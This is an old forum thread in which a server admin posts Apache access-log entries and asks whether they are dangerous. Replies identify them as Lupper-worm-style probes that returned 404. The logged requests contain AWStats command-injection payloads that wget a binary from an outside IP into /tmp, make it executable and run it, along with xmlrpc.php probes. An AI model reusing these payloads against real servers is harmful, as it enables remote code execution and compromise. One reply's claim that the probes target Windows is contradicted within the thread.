Apache entries

lawadm1 · 11-27-2005, 08:06 PM

I found the following entries in my access_log that I have never received before. It looks like they were all 404, but I would feel much better if someone verified it. TIA Jeff

211.214.161.159 - - [27/Nov/2005:14:13:22 -0600] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"

211.214.161.159 - - [27/Nov/2005:14:13:23 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"

211.214.161.159 - - [27/Nov/2005:14:13:25 -0600] "POST /xmlrpc.php HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"

211.214.161.159 - - [27/Nov/2005:14:13:27 -0600] "POST /blog/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"

211.214.161.159 - - [27/Nov/2005:14:13:28 -0600] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"

211.214.161.159 - - [27/Nov/2005:14:13:32 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"

211.214.161.159 - - [27/Nov/2005:14:13:33 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"

lord-fu · 11-27-2005, 08:22 PM

Hi,

Not a security expert but I have seen those in my logs as well and they are looking for those files on windoze machines. I believe IMHO that you can safely ignore those...however I am no expert and I am sure someone else will give their input as well.

btmiller · 11-27-2005, 08:49 PM

I think they are looking for *nix boxen, since these look a lot like hits from the Lupper worm, which attacks several vulnerable Web applications. I've seen this on a number of servers, and so long as you don't have the vulnerable applications installed, you are OK.